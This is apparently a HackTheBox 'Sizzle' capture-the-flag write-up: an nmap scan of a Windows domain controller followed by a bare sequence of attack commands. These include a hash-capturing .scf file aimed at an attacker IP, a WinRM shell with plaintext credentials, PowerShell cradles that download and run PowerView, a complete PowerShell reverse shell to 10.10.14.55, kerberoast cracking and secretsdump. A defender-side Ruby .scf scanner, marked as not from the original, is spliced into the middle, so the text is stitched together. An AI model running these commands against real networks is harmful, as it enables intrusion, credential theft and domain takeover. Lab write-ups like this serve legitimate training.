HackTheBox-Sizzle

NMAP

Nmap scan report for 10.129.158.103
Host is up (0.15s latency).
Not shown: 65507 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-11T12:59:51
| Not valid after: 2022-02-11T12:59:51
| MD5: 6346 07e3 ae83 0744 681e 3c0b 00ff 80d9
|_SHA-1: e071 44af 92c6 e202 8f21 0fc6 c9c7 433b 360b e3a9
|_ssl-date: 2022-01-31T15:25:38+00:00; 0s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-07-03T17:58:55
| Not valid after: 2020-07-02T17:58:55
| MD5: 240b 1eff 5a65 ad8d c64d 855e aeb5 9e6b
|_SHA-1: 77bb 3f67 1b6b 3e09 b8f9 6503 ddc1 0bbf 0b75 0c72
|_ssl-date: 2022-01-31T15:25:38+00:00; 0s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-11T12:59:51
| Not valid after: 2022-02-11T12:59:51
| MD5: 6346 07e3 ae83 0744 681e 3c0b 00ff 80d9
|_SHA-1: e071 44af 92c6 e202 8f21 0fc6 c9c7 433b 360b e3a9
|_ssl-date: 2022-01-31T15:25:38+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-11T12:59:51
| Not valid after: 2022-02-11T12:59:51
| MD5: 6346 07e3 ae83 0744 681e 3c0b 00ff 80d9
|_SHA-1: e071 44af 92c6 e202 8f21 0fc6 c9c7 433b 360b e3a9
|_ssl-date: 2022-01-31T15:25:38+00:00; -1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-11T12:59:51
| Not valid after: 2022-02-11T12:59:51
| MD5: 6346 07e3 ae83 0744 681e 3c0b 00ff 80d9
|_SHA-1: e071 44af 92c6 e202 8f21 0fc6 c9c7 433b 360b e3a9
|_ssl-date: 2022-01-31T15:25:38+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Issuer: commonName=HTB-SIZZLE-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-11T12:59:51
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49694/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49695/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC

PORT 21 (FTP)

Seeing FTP running, we can check for anonymous login. It was allowed, but there was nothing there.

PORT 80 (HTTP)

Visiting port 80, we see an image of a sizzle.

PORT 139/445 (SMB)

We can try running enum4linux, which enumerates SMB: it gathers operating-system information, lists shares and, where possible, collects usernames via LDAP and RPC.

[Shell]
Command=2
IconFile=\\10.10.14.58\uwu\uwu.ico
[Taskbar]
Command=ToggleDesktop
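
The .scf above sets IconFile to a UNC path on a host outside the domain, which is what a defender reviewing a writable share would want to flag. As an added defender-side check (example code, not from the original writeup), this Ruby script parses .scf files under a share root and reports any whose icon is fetched from a host not on an allowlist; the TRUSTED_ICON_HOSTS list and the sample file contents are assumptions.

```ruby
require 'find'

# Hosts allowed to serve icons over UNC paths (constructed allowlist for this example).
TRUSTED_ICON_HOSTS = %w[sizzle sizzle.htb.local].freeze

# Parse the INI-style body of a .scf file into {section => {key => value}},
# with section and key names lowercased for case-insensitive lookups.
def parse_scf(text)
  sections = Hash.new { |h, k| h[k] = {} }
  current = nil
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?(';')
    if (m = line.match(/\A\[(.+)\]\z/))
      current = m[1].downcase
    elsif current && (m = line.match(/\A([^=]+)=(.*)\z/))
      sections[current][m[1].strip.downcase] = m[2].strip
    end
  end
  sections
end

# Host component of a UNC path (\\host\share\...), or nil for local paths.
def unc_host(path)
  m = path.match(%r{\A\\\\([^\\]+)\\})
  m && m[1].downcase
end

# :remote_icon when IconFile resolves to a UNC path on an untrusted host, else :ok.
def classify_scf(text)
  icon = parse_scf(text).dig('shell', 'iconfile')
  return :ok unless icon
  host = unc_host(icon)
  return :ok if host.nil? || TRUSTED_ICON_HOSTS.include?(host)
  :remote_icon
end

# Walk a share root (a local directory here) and list .scf files with remote icons.
def scan_share(root)
  findings = []
  Find.find(root) do |path|
    next unless File.file?(path) && File.extname(path).casecmp?('.scf')
    findings << path if classify_scf(File.read(path)) == :remote_icon
  end
  findings
end

# Constructed sample mirroring the writeup's file; not captured from a real share.
SAMPLE_SCF = "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.14.58\\uwu\\uwu.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
```

Run scan_share against the mounted share root; any path it returns is a file whose icon would be fetched from an untrusted host when the folder is browsed.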
openssl req -new -newkey rsa:2048 -nodes -keyout arz.key -out arz.csr
openssl x509 -inform der -in certnew.cer -noout -text
require 'winrm'

# WinRM over HTTPS, authenticating with the client certificate issued above
conn = WinRM::Connection.new(
  endpoint: 'https://10.129.157.36:5986/wsman',
  transport: :ssl,
  client_cert: 'cert.cer',
  client_key: 'arz.key',
  user: 'amanda',
  password: 'Ashare1972',
  no_ssl_peer_verification: true
)

command = ''
conn.shell(:powershell) do |shell|
  until command == "exit\n"
    print 'PS > '
    command = gets || "exit\n"
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end

python3 bloodhound.py -d HTB.local -u 'Amanda' -p 'Ashare1972' -c all -ns 10.129.158.71
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.55:2222/PowerView.ps1');
powershell -version 2 -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.55:2222/PowerView.ps1');"
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.55",3333);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Invoke-WebRequest http://10.10.14.55:2222/powershell_rev.ps1 -outfile shell.ps1
powershell -version 2 -nop -nop -noexit -exec bypass -c '.\shell.ps1'
$Password = ConvertTo-SecureString 'Ashare1972' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\amanda', $Password)
hashcat -a 0 -m 13100 hash2.txt /opt/SecLists/Passwords/rockyou.txt --force
python3 secretsdump.py htb.local/mrlky:Football#7@10.129.158.71
